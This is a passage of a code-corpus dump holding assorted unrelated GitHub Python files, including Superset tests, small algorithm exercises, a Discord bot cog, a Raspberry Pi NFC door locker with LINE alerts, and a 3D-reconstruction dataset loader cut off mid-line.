5, 6]\",\n \"map_col\": \"{'chart_name': 'plot'}\",\n },\n ],\n )\n\n def test_single_column_multidim_nested_types(self):\n data = [\n (\n [\n \"test\",\n [\n [\n \"foo\",\n 123456,\n [\n [[\"test\"], 3432546, 7657658766],\n [[\"fake\"], 656756765, 324324324324],\n ],\n ]\n ],\n [\"test2\", 43, 765765765],\n None,\n None,\n ],\n )\n ]\n cursor_descr = [(\"metadata\",)]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.columns[0][\"type\"], \"STRING\")\n df = results.to_pandas_df()\n self.assertEqual(\n df_to_records(df),\n [\n {\n \"metadata\": '[\"test\", [[\"foo\", 123456, [[[\"test\"], 3432546, 7657658766], [[\"fake\"], 656756765, 324324324324]]]], [\"test2\", 43, 765765765], null, null]'\n }\n ],\n )\n\n def test_nested_list_types(self):\n data = [([{\"TestKey\": [123456, \"foo\"]}],)]\n cursor_descr = [(\"metadata\",)]\n results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n self.assertEqual(results.columns[0][\"type\"], \"STRING\")\n df = 
results.to_pandas_df()\n        self.assertEqual(\n            df_to_records(df), [{\"metadata\": '[{\"TestKey\": [123456, \"foo\"]}]'}]\n        )\n\n    def test_empty_datetime(self):\n        data = [(None,)]\n        cursor_descr = [(\"ds\", \"timestamp\", None, None, None, None, True)]\n        results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n        self.assertEqual(results.columns[0][\"type\"], \"TIMESTAMP\")\n\n    def test_no_type_coercion(self):\n        data = [(\"a\", 1), (\"b\", 2)]\n        cursor_descr = [\n            (\"one\", \"varchar\", None, None, None, None, True),\n            (\"two\", \"int\", None, None, None, None, True),\n        ]\n        results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n        self.assertEqual(results.columns[0][\"type\"], \"VARCHAR\")\n        self.assertEqual(results.columns[1][\"type\"], \"INT\")\n\n    def test_empty_data(self):\n        data = []\n        cursor_descr = [\n            (\"emptyone\", \"varchar\", None, None, None, None, True),\n            (\"emptytwo\", \"int\", None, None, None, None, True),\n        ]\n        results = SupersetResultSet(data, cursor_descr, BaseEngineSpec)\n        self.assertEqual(results.columns, [])\n","repo_name":"apache/superset","sub_path":"tests/integration_tests/result_set_tests.py","file_name":"result_set_tests.py","file_ext":"py","file_size_in_byte":9376,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"} +{"seq_id":"5696740956","text":"from collections import defaultdict\nimport sys\n\nn = int(sys.stdin.readline())\nperson = list(map(int, sys.stdin.readline().split()))\ngraph = defaultdict(list)\nfor i in range(n) :\n    a = list(map(int, sys.stdin.readline().split()))\n    graph[i+1] = a[1:]\n\nmini = 10000000000\n\ndef dfs1(index) :\n    global mini\n    visit[index] = 1\n    temp = visit[:]\n    if check(temp) :\n        a ,b = 0,0\n        for i in range(1,n+1) :\n            if visit[i] == 0 : a += person[i-1]\n            else : b += person[i-1]\n        mini = min(mini,abs(a-b))\n    # validation - check that the remaining districts are all connected\n    # if they are connected, compute the population difference\n\n    for i in graph[index] :\n        if visit[i] == 0 :\n            dfs1(i)\n            visit[i] = 0\n\n\ndef check(temp) :\n    for i in range(1,n+1) :\n        if temp[i] == 0 :\n            dfs(i,temp)\n            if 0 in temp : return False\n            return True \n    return False\n\ndef dfs(v,seen):\n    seen[v] = 1\n    for i in graph[v] :\n        if seen[i] == 0:\n            dfs(i,seen)\n\nfor i in range(1,n+1) :\n    # print(i)\n    visit = [0] * (n+1)\n    visit[0] = 1\n    dfs1(i)\n\nif mini == 10000000000 :\n    print(-1)\nelse : print(mini)","repo_name":"wnsrb003/backjunTEST","sub_path":"6월/17471.py","file_name":"17471.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41518604843","text":"# This runs as a standalone script (every minute) and as part of the module (every 20 minutes)\n\nimport requests\nimport json\nfrom .GetSecrets import append_json, write_json, get_secrets\nfrom SunScreenServer.ScreenMover import move_sunscreen\nfrom datetime import datetime,timedelta\n\nsecrets = get_secrets()\n\ndef check_array_high_wind(wind_speed_arr):\n    if(secrets['LOGGING']):\n        print('Wind speeds:', wind_speed_arr)\n    return wind_speed_arr[3] >= secrets['HIGH_WIND_DIRECT_MEASUREMENT']\n\ndef get_data():\n    windMosUrl = \"http://\"+secrets['WINDMOSIP']+\"/counter\"\n    r = requests.get(windMosUrl)\n    return r.json()\n\ndef screen_should_close():\n    if(secrets['DIRECT_MEASUREMENT_ENABLED']):\n        try:\n            json_buffer = get_data()\n            if(secrets['LOGGING']):\n                print(check_array_high_wind(json_buffer['averages']))\n                print(check_last_25_minutes_had_high_winds())\n            result = check_array_high_wind(json_buffer['averages']) 
or check_last_25_minutes_had_high_winds()\n            return result\n        except:\n            return True\n    else:\n        return False\n\n\ndef post_to_adafruit():\n    json_buffer = get_data()\n    adafruitFeed = secrets['ADAFRUIT_IO_FEEDS_URL'] + \"wind/data\"\n    headers = {'X-AIO-Key': secrets['ADAFRUIT_IO_KEY'], \"Content-Type\": \"application/json\"}\n    payload = {'value':json_buffer['averages'][3] }\n\n    r = requests.post(adafruitFeed, json=payload, headers=headers)\n\ndef check_last_25_minutes_had_high_winds(test_json_string=False):\n    if test_json_string:\n        print(test_json_string)\n        json_buff = json.loads(test_json_string)\n    else:\n        start_time = (datetime.utcnow() - timedelta(minutes=secrets['DIRECT_MEASUREMENT_LOOKBACK_MINUTES'])).isoformat()\n        adafruitFeed = secrets['ADAFRUIT_IO_FEEDS_URL'] + \"wind/data?start_time=\" + start_time\n        headers = {'X-AIO-Key': secrets['ADAFRUIT_IO_KEY']}\n\n        r = requests.get(adafruitFeed, headers=headers)\n        json_buff = r.json()\n\n    if(secrets['LOGGING']):\n        print('Adafruit loaded!')\n        print(json_buff)\n    wind_check = any(float(x['value']) >= secrets['HIGH_WIND_DIRECT_MEASUREMENT'] for x in json_buff)\n    if(secrets['LOGGING']):\n        print('Adafruit Wind check result')\n        print(wind_check)\n    return wind_check\n\n# print(r.text)\n","repo_name":"jcjveraa/sunscreen-controller","sub_path":"server_script/SunScreenServer/Windmanager.py","file_name":"Windmanager.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22752651114","text":"# Author : Bayu Aditya\nimport pandas as pd\n\ndef concatenate_atom_orbital(atomic_position, orbital_index, a, b, c):\n    \"\"\"Concatenate the dataframes from the \"atomic_position\" and \"orbital_index\" files.\n    \n    Example:\n        INPUT\n        a = 1.0\n        b = 1.0\n        c = 1.0\n        atomic_position\n            | atom | posX | posY | posZ |\n            +------+------+------+------+\n            | Sra | 0.0 | 0.0 | 0.0 |\n            | Nb | 0.5 | 0.5 | 0.5 |\n        orbital_index\n            | atom | n | orbital | orbital_index |\n            +------+---+---------+---------------+\n            | Sra | 4 | s | 1 |\n            | Sra | 3 | px | 2 |\n            | Sra | 3 | py | 3 |\n            | Sra | 3 | pz | 4 |\n            | Nb | 4 | s | 5 |\n        OUTPUT\n        OrbitalA\n            |A | Ax | Ay | Az |\n            +---+----+------+-------+\n            |1\t|0.0 |\t0.0 |\t0.0 |\n            |2\t|0.0 |\t0.0 |\t0.0 |\n            |3\t|0.0 |\t0.0 |\t0.0 |\n            |4\t|0.0 |\t0.0 |\t0.0 |\n            |5\t|0.5 |\t0.5 |\t0.5 |\n        OrbitalB\n            |B | Bx | By | Bz |\n            +---+----+------+-------+\n            |1\t|0.0 |\t0.0 |\t0.0 |\n            |2\t|0.0 |\t0.0 |\t0.0 |\n            |3\t|0.0 |\t0.0 |\t0.0 |\n            |4\t|0.0 |\t0.0 |\t0.0 |\n            |5\t|0.5 |\t0.5 |\t0.5 |\n    \n    Arguments:\n        atomic_position {str} -- path to the atomic_position file\n        orbital_index {str} -- path to the orbital_index file\n        a {numpy.float64} -- lattice parameter in the X direction\n        b {numpy.float64} -- lattice parameter in the Y direction\n        c {numpy.float64} -- lattice parameter in the Z direction\n    \n    Returns:\n        tuple -- tuple of size [2,] where tuple[0] and tuple[1] are pandas.DataFrame\n    \"\"\"\n    # read dataframe\n    atom = pd.read_csv(atomic_position) # position atoms\n    orbital = pd.read_csv(orbital_index) # orbital indexes\n    # merge dataframe\n    atom_orbital = orbital.merge(atom)\n    # only choose certain columns\n    atom_orbital = atom_orbital[[\"orbital_index\", \"posX\", \"posY\", \"posZ\"]]\n    # multiply positions by the lattice parameters\n    atom_orbital[\"posX\"] = atom_orbital[\"posX\"]*a\n    atom_orbital[\"posY\"] = atom_orbital[\"posY\"]*b\n    atom_orbital[\"posZ\"] = atom_orbital[\"posZ\"]*c\n    # create new dataframe and rename columns\n    orbitalA, orbitalB = atom_orbital.copy(), atom_orbital.copy()\n    orbitalA.columns = 
[\"A\", \"Ax\", \"Ay\", \"Az\"]\n orbitalB.columns = [\"B\", \"Bx\", \"By\", \"Bz\"]\n return orbitalA, orbitalB","repo_name":"bayu-aditya/Undergraduate_Thesis","sub_path":"Tight_Binding/src/concat.py","file_name":"concat.py","file_ext":"py","file_size_in_byte":2547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"7077867655","text":"from bs4 import BeautifulSoup\nimport pandas as pd\nimport requests\nimport re\n\ndf = pd.DataFrame(columns=[\"Pais destinatário\",\"Tempo\",\"Distancia\",\"Envio\",\"Chegada\",\"ID\"])\ndados = []\n\ndef pegar_dados(link):\n html_text = requests.get(link).text\n soup = BeautifulSoup(html_text, 'lxml')\n\n if soup.find(\"i\",{\"class\":\"icn-mini r15\"}) != None:\n tempo = soup.find(\"i\",{\"class\":\"icn-mini r15\"}).next_sibling.text.replace(\"\\n\", \"\").replace(\" \", \"\")\n distancia = soup.find(\"i\", {\"class\": \"icn-mini r4\"}).next_sibling.text.replace(\"\\n\", \"\").replace(\" \", \"\").replace(\" \", \"\")\n pais_destinatario = soup.find_all('a',itemprop=\"addressCountry\")[1].text\n envio = soup.find('time',itemprop=\"startTime\").text\n chegada = soup.find('time',itemprop=\"endTime\").text\n return [pais_destinatario,distancia,tempo,envio,chegada]\n\nfor i in range(5000):\n if pegar_dados(f\"\"\"https://www.postcrossing.com/postcards/NL-{5395682-i}\"\"\") != None:\n dados = pegar_dados(f\"\"\"https://www.postcrossing.com/postcards/NL-{5395682-i}\"\"\")\n dados.append(5395682 - i)\n df.loc[len(df)] = dados\n print(f\"\"\"{i}/5000\"\"\")\ndf.to_excel(r'YourAddress.xlsx', index=False)","repo_name":"DaniloSucomine/PostCrossing-WebScrapping","sub_path":"PostCrossing Data.py","file_name":"PostCrossing Data.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12528498983","text":"from mfm_learner.utils import utils\nutils.init_logger()\nfrom mfm_learner.datasource import datasource_factory\nfrom mfm_learner.example.factors.turnover_rate import TurnOverFactor\n\n\n# pytest test/unitest/test_turnover_rate_factor.py -s\ndef test_ivff():\n turnover_factor = TurnOverFactor()\n\n start_date = '20200101'\n end_date = '20200130'\n index_code = \"000905.SH\"\n stocks = datasource_factory.get().index_weight(index_code, start_date)\n stocks = stocks[:5]\n df = turnover_factor.calculate(stocks, start_date, end_date)\n df = df.reset_index()\n df = df.set_index(['datetime','code'])\n df = df.unstack('code')\n print(df)\n","repo_name":"piginzoo/mfm_learner","sub_path":"test/unitest/test_turnover_rate_factor.py","file_name":"test_turnover_rate_factor.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"61"} +{"seq_id":"17493752099","text":"#read txt method three\nf2 = open(\"/home/sgl/bwhe/DNSGrep/fdns_a/record.txt\",\"r\")\nlines = f2.readlines()\nprint(\"00000000000000000000000000000000\")\nfor i in range(len(lines)):\n if(i%3==0):\n s1=\";\"+lines[i][4:-5]\n if(i%3==1):\n print(lines[i][:-1]+s1)\n\n","repo_name":"hebowen325/dual_stack_data","sub_path":"server_data/chrecord.py","file_name":"chrecord.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11097962364","text":"import pickle\n\n\ndef write_to_text_file(d, file_path):\n \"\"\"\n Writes the dict to a file in a more readable format (debug mostly)\n :param 
file_path: filepath, where to write\n :param d: dictonary\n :return:\n \"\"\"\n with open(file_path, \"w\") as file_handler:\n for key, rooms in d.items():\n file_handler.write(key + \": \" + str(len(rooms)) + \" rooms\\n\")\n for room in rooms:\n if type(room) != str:\n continue\n file_handler.write(\" \" + room + \"\\n\")\n file_handler.write(\"\\n\")\n\n return True\n\n\nif __name__ == \"__main__\":\n to_pickle_file = open(\"saved_files/rooms_by_school_file\", \"rb\")\n rooms_by_school_dict = pickle.load(to_pickle_file)\n\n for test_key, test_rooms in rooms_by_school_dict.items():\n print(test_key + \":\", len(test_rooms), \"rooms\")\n for test_room in test_rooms:\n print(\" \", test_room)\n print()\n write_to_text_file(rooms_by_school_dict, \"saved_files/rooms_by_school_pretty\")\n","repo_name":"EmilUpp/skola24_scraper","sub_path":"reading_test.py","file_name":"reading_test.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15616210167","text":"import discord\nfrom discord.ext import commands\nimport random\n\nclass fun(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(\"Fun Commands Ready!\")\n \n @commands.command()\n async def magic8ball(self, ctx, *, question):\n ballresponses = ['Yes', 'No', 'It is certain', 'It is decidedly so', 'Without a doubt', 'Yes - definitely', 'You may rely on it', 'As I see it, yes', 'Most likely', 'Outlook good', 'Signs point to yes', 'Reply hazy', 'try again', 'Ask again later', 'Better not tell you now', 'Cannot predict now', 'Affirmative', 'Dont count on it', 'My reply is no', 'My sources say no', 'Outlook not so good', 'Very doubtful']\n await ctx.send(f\"Question: {question}\\nAnswer: {random.choice(ballresponses)}\")\n \n @commands.command()\n async def rps_rock(self, ctx):\n user_choice = \"rock\"\n bot_choice = random.choice([\"rock\", \"paper\", \"scissors\"])\n if bot_choice == user_choice:\n await ctx.send(\"It's a tie!\")\n elif bot_choice == \"paper\":\n await ctx.send(\"YES! I win! Paper beats rock!\")\n elif bot_choice == \"scissors\":\n await ctx.send(\"NOOOO! You win! Rock beats scissors!\")\n \n @commands.command()\n async def rps_paper(self, ctx):\n user_choice = \"paper\"\n bot_choice = random.choice([\"rock\", \"paper\", \"scissors\"])\n if bot_choice == user_choice:\n await ctx.send(\"It's a tie!\")\n elif bot_choice == \"scissors\":\n await ctx.send(\"YES! I win! Scissors beats paper!\")\n elif bot_choice == \"rock\":\n await ctx.send(\"NOOOO! You win! Paper beats rock!\")\n \n @commands.command()\n async def rps_scissors(self, ctx):\n user_choice = \"scissors\"\n bot_choice = random.choice([\"rock\", \"paper\", \"scissors\"])\n if bot_choice == user_choice:\n await ctx.send(\"It's a tie!\")\n elif bot_choice == \"rock\":\n await ctx.send(\"YES! I win! Rock beats scissors!\")\n elif bot_choice == \"paper\":\n await ctx.send(\"NOOOO! You win! 
Scissors beats paper!\")\n\n    @commands.command()\n    async def flip(self, ctx):\n        choice = random.choice([\"heads\", \"tails\"])\n        if choice == \"heads\":\n            await ctx.send(\"It's heads!\")\n        elif choice == \"tails\":\n            await ctx.send(\"It's tails!\")\n    \n    @commands.command()\n    async def say(self, ctx, *, message):\n        await ctx.send(message)\n    \n    @commands.command()\n    async def sayembed(self, ctx, *, message):\n        await ctx.send(embed=discord.Embed(description=message))\n\n    @commands.command()\n    async def diceroll(self, ctx):\n        dice = random.randint(1, 6)\n        await ctx.send(f\"You rolled a {dice}!\")\n\nasync def setup(bot):\n    await bot.add_cog(fun(bot))","repo_name":"jmalik6209/discord-bot","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27684806402","text":"from enum import Enum, auto\nimport json\nimport requests\n\n\nclass TestGroup:\n    \"\"\"\n    TestGroup defines a set of tests to be run for a specific application.\n    \"\"\"\n\n    def __init__(self, **kwargs):\n        self.application = kwargs[\"application\"]\n        self.name = kwargs[\"name\"]\n        self.slack_message = SlackMessage(text=\"\")\n        self.tests = kwargs[\"tests\"]\n\n\nclass Request:\n    \"\"\"\n    Request defines a python [request] object.\n    \"\"\"\n\n    def __init__(self, **kwargs):\n        self.method = kwargs[\"method\"]\n        self.url = kwargs[\"url\"]\n        self.payload = kwargs.get(\"payload\")\n\n    def call(self):\n        if self.method == \"GET\":\n            return requests.get(self.url, params=self.payload, timeout=15)\n        if self.method == \"POST\":\n            return requests.post(self.url, json=self.payload, timeout=15)\n\n        # More method types can be added here...\n        raise Exception(\"Unsupported method type!\")\n\n\nclass Result(Enum):\n    \"\"\"\n    Result defines the result of running a test.\n    \"\"\"\n\n    SUCCESS = auto()\n    ERROR = auto()\n    TIMEOUT = auto()\n\n\nclass Application(Enum):\n    \"\"\"\n    Application defines which application a test group belongs to.\n    \"\"\"\n\n    EATERY = auto()\n    TRANSIT = auto()\n    UPLIFT = auto()\n    COURSEGRAB = auto()\n    VOLUME = auto()\n\n\nclass Test:\n    \"\"\"\n    Test defines a test object, with an optional closure. More information on [closure] is\n    specified below.\n    \"\"\"\n\n    def __init__(self, **kwargs):\n        self.name = kwargs[\"name\"]\n        self.request = kwargs[\"request\"]\n\n        # An optional closure. This allows a user to define a function [f: request -> bool]\n        # to perform any additional operations. For example, a user could check the format\n        # of a response, or verify that certain data is included.\n        # If the value is not provided, a lambda that returns True is the default.\n        self.callback = kwargs.get(\"callback\", lambda r: True)\n\n    def get_result(self):\n        try:\n            r = self.request.call()\n            if r.status_code == 200 and self.callback(r):\n                return Result.SUCCESS\n            return Result.ERROR\n        except requests.exceptions.Timeout:\n            return Result.TIMEOUT\n        except requests.exceptions.RequestException:\n            return Result.ERROR\n\n\nclass SlackMessage:\n    \"\"\"\n    SlackMessage defines a slack message object which contains information on whether a\n    message should send and the contents of the message.\n    \"\"\"\n\n    def __init__(self, **kwargs):\n        self.text = kwargs[\"text\"]\n        self.should_send = True\n\n\nclass Config:\n    \"\"\"\n    Config defines a configuration for each tested app containing whether the app tests\n    are ON, OFF, or FAILED. Note: In main.py, apps that are mapped to FAILED will be\n    tested but will not ping slack users. 
If the tests succeed, then the app will\n    be mapped to ON.\n    \"\"\"\n\n    SETTINGS = [\"ON\", \"OFF\", \"FAILED\"]\n\n    def __init__(self, config):\n        self._config = {}\n        config = config.replace(\"{\",\"\").replace(\"}\",\"\").split(\",\")\n        for c in config:\n            c = c.strip().replace(\"\\\"\",\"\")\n            k, v = c.split(\": \")\n            self._config[k] = v\n\n    @classmethod\n    def create_default_config(cls, test_groups):\n        default_json = json.dumps({app.name: \"ON\" for app in test_groups})\n        return cls(default_json)\n\n    def __len__(self):\n        return len(self._config)\n\n    def __str__(self):\n        return json.dumps(self._config)\n\n    def get(self, app_name):\n        return self._config.get(app_name)\n\n    def set(self, app_name, setting):\n        if setting in self.SETTINGS and app_name in self._config.keys():\n            self._config[app_name] = setting\n            return True\n        else:\n            return False\n","repo_name":"cuappdev/integration","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33075372783","text":"#Zara Paul \n#write code that finds an input number to be even or odd \n\n\nimport os\nos.system('clear')\n\nvariable= input('enter a number') #put number in \nnum=int(variable) #number is integer \nprint(num) #prints the 1 or the 0 \nif num%2 == 0: \n    print ('you are even') \nelse: \n    print('you are odd') \n\n\nif (num%3==0):\n    print (\"number is a multiple of 3\" )\n\n\nif (num%5==0):\n    print (\"number is a multiple of 5\" )\n\n","repo_name":"paulz25/Game-Design-Morning","sub_path":"pythonFIles/integersandfloats.py","file_name":"integersandfloats.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16908244136","text":"import numpy as np\nimport sys\nimport os\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.join(BASE_DIR))\n\nfrom _ext import lib, ffi\n\ndef find_nearest_point_idx(ref_pts, que_pts):\n    assert(ref_pts.shape[1] == que_pts.shape[1] and 1 < que_pts.shape[1] <= 3)\n    pn1 = ref_pts.shape[0]\n    pn2 = que_pts.shape[0]\n    dim = ref_pts.shape[1]\n\n    ref_pts = np.ascontiguousarray(ref_pts[None,:,:], np.float32)\n    que_pts = np.ascontiguousarray(que_pts[None,:,:], np.float32)\n    idxs = np.zeros([1, pn2], np.int32)\n\n    ref_pts_ptr = ffi.cast('float *', ref_pts.ctypes.data)\n    que_pts_ptr = ffi.cast('float *', que_pts.ctypes.data)\n    idxs_ptr = ffi.cast('int *', idxs.ctypes.data)\n    lib.findNearestPointIdxLauncher(ref_pts_ptr, que_pts_ptr, idxs_ptr, 1, pn1, pn2, dim, 0)\n\n    return idxs[0]\n","repo_name":"xingyul/stereobj-1m","sub_path":"evaluation/nn/nn_utils.py","file_name":"nn_utils.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"61"} +{"seq_id":"1496577649","text":"import numpy as np\n\ndef f(x, y):\n    return x ** 3 + y ** 2 - x * 3 - y * 2 + 2\n\ndef gradient(x, y):\n    df_dx = 3 * x ** 2 - 3\n    df_dy = 2 * y - 2\n    return np.array([df_dx, df_dy])\n\ndef gradient_descent(x0, epsilon1, epsilon2, M):\n    x = np.array(x0)\n    k = 0\n\n    while True:\n        grad = gradient(x[0], x[1])\n\n        if np.linalg.norm(grad) < epsilon1:\n            return x\n\n        if k >= M:\n            return x\n\n        def f_gamma(gamma):\n            return f(x[0] - gamma * grad[0], x[1] - gamma * grad[1])\n\n        # line search: np.argmin returns an index, so map it back to a gamma value\n        gammas = np.linspace(0, 1, 100)\n        gamma_star = gammas[np.argmin([f_gamma(g) for g in gammas])]\n\n        x_new = x - gamma_star * grad\n\n        if (np.linalg.norm(x_new - x) <= epsilon2 
and\n np.abs(f(x_new[0], x_new[1]) - f(x[0], x[1])) <= epsilon2):\n return x_new\n\n x = x_new\n k += 1\n\nx0 = [0, 0]\nepsilon1 = 1e-6\nepsilon2 = 1e-6\nM = 1000\n\nresult = gradient_descent(x0, epsilon1, epsilon2, M)\nprint(result)","repo_name":"Klok1305/optimization","sub_path":"Мусорка/метод наискорейшего градиентного спуска.py","file_name":"метод наискорейшего градиентного спуска.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1433935744","text":"import RPi.GPIO as GPIO\nimport time\nimport sys\nfrom util import servo, reader, LINENotifyBot\nimport os\n\nclass Locker(object):\n def __init__(self):\n #登録済みNFC IDの読み取り\n self.id_list = os.environ[\"NFC_ID\"].split(\":\")\n\n #GPIOピンをプルダウン入力に設定\n self.gp_in_yellow = 16\n self.gp_in_red = 25\n self.gp_in_green = 24\n self.gp_in_blue = 23\n\n #GPIO4を制御パルスの出力に設定\n self.gp_out = 4\n\n self.if_open = True\n\n #LINE Notify用のアクセストークン\n access_token = os.environ[\"LINE_NOTIFY_KEY\"]\n self.bot = LINENotifyBot(access_token=access_token)\n\n GPIO.setmode(GPIO.BCM)\n\n #アンロックピンのセットアップ\n GPIO.setup(self.gp_in_yellow, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(self.gp_in_yellow, GPIO.RISING, callback=self.callback_open, bouncetime=1000)\n \n #ロックピンのセットアップ\n GPIO.setup(self.gp_in_red, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(self.gp_in_red, GPIO.RISING, callback=self.callback_close, bouncetime=1000)\n\n #補助ピンAのセットアップ\n GPIO.setup(self.gp_in_green, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(self.gp_in_green, GPIO.RISING, callback=self.callback_wait_lock, bouncetime=1000)\n\n #補助ピンBのセットアップ\n GPIO.setup(self.gp_in_blue, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n GPIO.add_event_detect(self.gp_in_blue, GPIO.RISING, callback=self.callback_donki, bouncetime=1000)\n\n #出力ピンのセットアップ\n GPIO.setup(self.gp_out, GPIO.OUT)\n servo(self.gp_out, GPIO, 0)\n\n def exec(self):\n cr = reader(self.id_list)\n while True:\n try:\n cr.read_id()\n if self.if_open:\n self.callback_close(0)\n else:\n self.callback_open(0)\n\n except KeyboardInterrupt: #Ctrl+Cキーが押して,\n GPIO.cleanup() #GPIOをクリーンアップし,\n sys.exit() #プログラムを終了\n\n def callback_open(self, channel):\n servo(self.gp_out, GPIO, 90) #サーボモータを90度に動作\n servo(self.gp_out, GPIO, 0) #サーボモータを0度に動作\n self.if_open = True\n self.bot.send(message = \"解錠しました\")\n\n def callback_close(self, channel):\n servo(self.gp_out, GPIO, -90) #サーボモータを-90度に動作\n servo(self.gp_out, GPIO, 0) #サーボモータを0度に動作\n self.if_open = False\n self.bot.send(message = \"施錠しました\")\n\n def callback_costco(self, channel):\n self.bot.send(message = \"Costco行かね?\")\n\n def callback_donki(self, channel):\n self.bot.send(message = \"ドンキ行かね?\")\n\n def callback_wait_lock(self, channel):\n self.bot.send(message = \"5秒後に施錠します\")\n time.sleep(5)\n self.callback_close(0)\n\nif __name__ == \"__main__\":\n locker = Locker()\n locker.exec()","repo_name":"kumagaimasahito/auto-locker-pi","sub_path":"src/auto-locker-pi/autoLocker.py","file_name":"autoLocker.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74183739713","text":"import torch\nimport torch.nn.functional as F\nimport cv2 as cv\nimport numpy as np\nimport os\nfrom glob import glob\nfrom scipy.spatial.transform import Rotation as Rot\nfrom scipy.spatial.transform import Slerp\nfrom tqdm import tqdm\n\n\n# This function is borrowed from IDR: 
https://github.com/lioryariv/idr\ndef load_K_Rt_from_P(filename, P=None):\n if P is None:\n lines = open(filename).read().splitlines()\n if len(lines) == 4:\n lines = lines[1:]\n lines = [[x[0], x[1], x[2], x[3]] for x in (x.split(\" \") for x in lines)]\n P = np.asarray(lines).astype(np.float32).squeeze()\n\n out = cv.decomposeProjectionMatrix(P)\n K = out[0]\n R = out[1]\n t = out[2]\n\n K = K / K[2, 2]\n intrinsics = np.eye(4)\n intrinsics[:3, :3] = K\n\n pose = np.eye(4, dtype=np.float32)\n pose[:3, :3] = R.transpose()\n pose[:3, 3] = (t[:3] / t[3])[:, 0]\n\n return intrinsics, pose\n\n\nclass Dataset:\n def __init__(self, conf):\n super(Dataset, self).__init__()\n print('Load data: Begin')\n self.device = torch.device('cuda')\n self.conf = conf\n\n self.data_dir = conf.get_string('data_dir')\n self.render_cameras_name = conf.get_string('render_cameras_name')\n self.object_cameras_name = conf.get_string('object_cameras_name')\n\n self.camera_outside_sphere = conf.get_bool('camera_outside_sphere', default=True)\n self.scale_mat_scale = conf.get_float('scale_mat_scale', default=1.1)\n self.near = conf.get_float('near', default=-1)\n self.far = conf.get_float('far', default=-1)\n self.n_frames = conf.get_int('n_frames', default=128)\n\n camera_dict = np.load(os.path.join(self.data_dir, self.render_cameras_name))\n self.camera_dict = camera_dict\n self.images_lis = sorted(glob(os.path.join(self.data_dir, 'image/*.png')))\n self.n_images = len(self.images_lis)\n self.images_np = np.stack([cv.imread(im_name) for im_name in self.images_lis]) / 256.0\n self.masks_lis = sorted(glob(os.path.join(self.data_dir, 'mask/*.png')))\n self.masks_np = np.stack([cv.imread(im_name) for im_name in self.masks_lis]) / 256.0\n\n # world_mat is a projection matrix from world to image\n self.world_mats_np = [camera_dict['world_mat_%d' % idx].astype(np.float32) for idx in range(self.n_images)]\n self.fid_list = [torch.LongTensor(np.array([camera_dict['fid_%d' % idx]])) for idx in range(self.n_images)]\n self.scale_mats_np = []\n\n # scale_mat: used for coordinate normalization, we assume the scene to render is inside a unit sphere at origin.\n self.scale_mats_np = [camera_dict['scale_mat_%d' % idx].astype(np.float32) for idx in range(self.n_images)]\n\n self.intrinsics_all = []\n self.pose_all = []\n self.proj_all = []\n\n for scale_mat, world_mat in zip(self.scale_mats_np, self.world_mats_np):\n P = world_mat @ scale_mat\n P = P[:3, :4]\n intrinsics, pose = load_K_Rt_from_P(None, P)\n self.intrinsics_all.append(torch.from_numpy(intrinsics).float())\n self.pose_all.append(torch.from_numpy(pose).float())\n self.proj_all.append(torch.from_numpy(P).float())\n\n self.images = torch.from_numpy(self.images_np.astype(np.float32)).cpu() # [n_images, H, W, 3]\n self.masks = torch.from_numpy(self.masks_np.astype(np.float32)).cpu() # [n_images, H, W, 3]\n self.errors = self.masks[:, :, :, :1].clone()\n self.errors = F.interpolate(self.errors.permute(0, 3, 1, 2), (self.images.shape[1] // 8, self.images.shape[2] // 8), mode='bilinear')\n self.errors = F.max_pool2d(self.errors, 7, stride=1, padding=3)\n self.errors = self.errors.permute(0, 2, 3, 1)\n self.radius = torch.zeros(self.masks.shape[0], self.masks.shape[2], self.masks.shape[1], 1) # [n_images, W, H, 3]\n \n self.intrinsics_all = torch.stack(self.intrinsics_all).to(self.device) # [n_images, 4, 4]\n self.intrinsics_all_inv = torch.inverse(self.intrinsics_all) # 